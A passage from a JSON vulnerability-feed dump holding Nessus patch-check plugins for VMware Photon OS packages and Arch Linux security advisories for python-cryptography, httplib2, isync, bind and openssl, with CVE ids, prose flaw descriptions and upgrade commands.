"nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35507", "CVE-2020-35496", "CVE-2020-35494", "CVE-2020-35493", "CVE-2020-35495"], "modified": "2021-02-27T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:binutils"], "id": "PHOTONOS_PHSA-2021-2_0-0321_BINUTILS.NASL", "href": "https://www.tenable.com/plugins/nessus/146876", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0321. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146876);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-35493\",\n \"CVE-2020-35494\",\n \"CVE-2020-35495\",\n \"CVE-2020-35496\",\n \"CVE-2020-35507\"\n );\n\n script_name(english:\"Photon OS 2.0: Binutils PHSA-2021-2.0-0321\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the binutils package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-321.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-35494\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:binutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'binutils-2.32-3.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'binutils-devel-2.32-3.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'binutils');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-02-28T01:12:47", "description": "An update of the salt3 package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 1.0: Salt3 PHSA-2021-1.0-0364", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35662", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3197", "CVE-2020-28972", "CVE-2021-3148", "CVE-2021-25281", "CVE-2021-25282", "CVE-2020-28243", "CVE-2021-3144"], "modified": 
"2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0364_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/146877", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0364. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146877);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-28243\",\n \"CVE-2020-28972\",\n \"CVE-2020-35662\",\n \"CVE-2021-25281\",\n \"CVE-2021-25282\",\n \"CVE-2021-25283\",\n \"CVE-2021-25284\",\n \"CVE-2021-3144\",\n \"CVE-2021-3148\",\n \"CVE-2021-3197\"\n );\n\n script_name(english:\"Photon OS 1.0: Salt3 PHSA-2021-1.0-0364\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-364.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3197\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-api-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-cloud-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-master-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-minion-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-proxy-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-spm-2019.2.4-2.ph1')) 
flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-ssh-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-syndic-2019.2.4-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'salt3');\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the go package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 3.0: Go PHSA-2021-3.0-0200", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3115"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:go", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0200_GO.NASL", "href": "https://www.tenable.com/plugins/nessus/146875", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0200. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146875);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\"CVE-2021-3115\");\n\n script_name(english:\"Photon OS 3.0: Go PHSA-2021-3.0-0200\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the go package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-200.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3115\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:go\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'go-1.13.15-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'go-md2man-2.0.0-4.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'go');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the salt3 package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 3.0: Salt3 PHSA-2021-3.0-0200", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35662", "CVE-2021-25283", "CVE-2020-28972", "CVE-2021-3148", "CVE-2021-25281", "CVE-2021-25282", "CVE-2020-28243", "CVE-2021-3144"], "modified": "2021-02-27T00:00:00", "cpe": 
["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0200_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/146874", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0200. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146874);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-28243\",\n \"CVE-2020-28972\",\n \"CVE-2020-35662\",\n \"CVE-2021-25281\",\n \"CVE-2021-25282\",\n \"CVE-2021-25283\",\n \"CVE-2021-3144\",\n \"CVE-2021-3148\"\n );\n\n script_name(english:\"Photon OS 3.0: Salt3 PHSA-2021-3.0-0200\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-200.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3148\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-api-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-cloud-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-master-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-minion-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-proxy-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-spm-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', 
reference:'salt3-ssh-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-syndic-2019.2.8-3.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'salt3');\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-36242"], "description": "Arch Linux Security Advisory ASA-202102-36\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2020-36242\nPackage : python-cryptography\nType : incorrect calculation\nRemote : No\nLink : https://security.archlinux.org/AVG-1541\n\nSummary\n=======\n\nThe package python-cryptography before version 3.4-1 is vulnerable to\nincorrect calculation.\n\nResolution\n==========\n\nUpgrade to 3.4-1.\n\n# pacman -Syu \"python-cryptography>=3.4-1\"\n\nThe problem has been fixed upstream in version 3.4.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn python-cryptography before version 3.3.2, certain sequences of\nupdate calls to symmetrically encrypt multiple gigabytes of data could\nresult in an integer overflow, leading to mishandling of buffers.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://github.com/pyca/cryptography/security/advisories/GHSA-rhm9-p9w5-fwm7\nhttps://github.com/pyca/cryptography/issues/5615\nhttps://github.com/pyca/cryptography/pull/5747\nhttps://github.com/pyca/cryptography/commit/82b6ce28389f0a317bc55ba2091a74b346db7cae\nhttps://security.archlinux.org/CVE-2020-36242\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-36", "href": "https://security.archlinux.org/ASA-202102-36", "type": "archlinux", "title": "[ASA-202102-36] python-cryptography: 
incorrect calculation", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21240"], "description": "Arch Linux Security Advisory ASA-202102-35\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2021-21240\nPackage : python-httplib2\nType : denial of service\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1546\n\nSummary\n=======\n\nThe package python-httplib2 before version 0.19.0-1 is vulnerable to\ndenial of service.\n\nResolution\n==========\n\nUpgrade to 0.19.0-1.\n\n# pacman -Syu \"python-httplib2>=0.19.0-1\"\n\nThe problem has been fixed upstream in version 0.19.0.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn python-httplib2 before version 0.19.0, a malicious server which\nresponds with long series of \"\\xa0\" characters in the \"www-\nauthenticate\" header may cause Denial of Service (CPU burn while\nparsing header) of the httplib2 client accessing said server. 
This is\nfixed in version 0.19.0 which contains a new implementation of auth\nheaders parsing using the pyparsing library.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\nhttps://github.com/httplib2/httplib2/pull/182\nhttps://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\nhttps://security.archlinux.org/CVE-2021-21240\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-35", "href": "https://security.archlinux.org/ASA-202102-35", "type": "archlinux", "title": "[ASA-202102-35] python-httplib2: denial of service", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20247"], "description": "Arch Linux Security Advisory ASA-202102-38\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2021-20247\nPackage : isync\nType : directory traversal\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1598\n\nSummary\n=======\n\nThe package isync before version 1.3.5-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 1.3.5-1.\n\n# pacman -Syu \"isync>=1.3.5-1\"\n\nThe problem has been fixed upstream in version 1.3.5.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue was found in isync/mbsync before versions 1.3.5 and\n1.4.1. Validations of the mailbox names returned by IMAP LIST/LSUB do\nnot occur, allowing a malicious or compromised server to use specially\ncrafted mailbox names containing '..' 
path components to access data\noutside the designated mailbox on the opposite end of the\nsynchronization channel.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://www.openwall.com/lists/oss-security/2021/02/22/1\nhttps://sourceforge.net/p/isync/isync/ci/fe5d59f8e3169944e57eb1c60155c9ebd4912d48/\nhttps://security.archlinux.org/CVE-2021-20247\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-38", "href": "https://security.archlinux.org/ASA-202102-38", "type": "archlinux", "title": "[ASA-202102-38] isync: directory traversal", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8625"], "description": "Arch Linux Security Advisory ASA-202102-40\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-8625\nPackage : bind\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1589\n\nSummary\n=======\n\nThe package bind before version 9.16.12-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 9.16.12-1.\n\n# pacman -Syu \"bind>=9.16.12-1\"\n\nThe problem has been fixed upstream in version 9.16.12.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue was found in BIND 9.5.0 up to 9.11.27, 9.12.0 up to\n9.16.11, and versions BIND 9.11.3-S1 up to 9.11.27-S1 and 9.16.8-S1 up\nto 9.16.11-S1 of BIND Supported Preview Edition, as well as the release\nversions 9.17.0 and 9.17.1 of the BIND 9.17 development branch. 
A\nvulnerability in BIND's GSSAPI security policy can be targeted by a\nbuffer overflow attack.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://kb.isc.org/docs/cve-2020-8625\nhttps://downloads.isc.org/isc/bind9/9.16.12/patches/CVE-2020-8625.patch\nhttps://security.archlinux.org/CVE-2020-8625\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-40", "href": "https://security.archlinux.org/ASA-202102-40", "type": "archlinux", "title": "[ASA-202102-40] bind: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23840", "CVE-2021-23841"], "description": "Arch Linux Security Advisory ASA-202102-42\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2021-23840 CVE-2021-23841\nPackage : openssl\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1581\n\nSummary\n=======\n\nThe package openssl before version 1.1.1.j-1 is vulnerable to multiple\nissues including denial of service and incorrect calculation.\n\nResolution\n==========\n\nUpgrade to 1.1.1.j-1.\n\n# pacman -Syu \"openssl>=1.1.1.j-1\"\n\nThe problems have been fixed upstream in version 1.1.1.j.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-23840 (incorrect calculation)\n\nCalls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may\noverflow the output length argument in some cases where the input\nlength is close to the maximum permissible length for an integer on the\nplatform. In such cases the return value from the function call will be\n1 (indicating success), but the output length value will be negative.\nThis could cause applications to behave incorrectly or crash.\n\nOpenSSL versions 1.1.1i and below are affected by this issue. 
Users of\nthese versions should upgrade to OpenSSL 1.1.1j.\n\nOpenSSL versions 1.0.2x and below are affected by this issue. However\nOpenSSL 1.0.2 is out of support and no longer receiving public updates.\nPremium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y.\nOther users should upgrade to 1.1.1j.\n\nFixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL\n1.0.2y (Affected 1.0.2-1.0.2x).\n\n- CVE-2021-23841 (denial of service)\n\nThe OpenSSL public API function X509_issuer_and_serial_hash() attempts\nto create a unique hash value based on the issuer and serial number\ndata contained within an X509 certificate. However it fails to\ncorrectly handle any errors that may occur while parsing the issuer\nfield (which might occur if the issuer field is maliciously\nconstructed). This may subsequently result in a NULL pointer deref and\na crash leading to a potential denial of service attack.\n\nThe function X509_issuer_and_serial_hash() is never directly called by\nOpenSSL itself so applications are only vulnerable if they use this\nfunction directly and they use it on certificates that may have been\nobtained from untrusted sources.\n\nOpenSSL versions 1.1.1i and below are affected by this issue. Users of\nthese versions should upgrade to OpenSSL 1.1.1j.\n\nOpenSSL versions 1.0.2x and below are affected by this issue. 
However\nOpenSSL 1.0.2 is out of support and no longer receiving public updates.\nPremium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y.\nOther users should upgrade to 1.1.1j.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://www.openssl.org/news/secadv/20210216.txt\nhttps://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1\nhttps://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2\nhttps://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8130d654d1de922ea224fa18ee3bc7262edc39c0\nhttps://security.archlinux.org/CVE-2021-23840\nhttps://security.archlinux.org/CVE-2021-23841\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-42", "href": "https://security.archlinux.org/ASA-202102-42", "type": "archlinux", "title": "[ASA-202102-42] openssl: multiple issues", "cvss": {"score": 5.0, "vector": 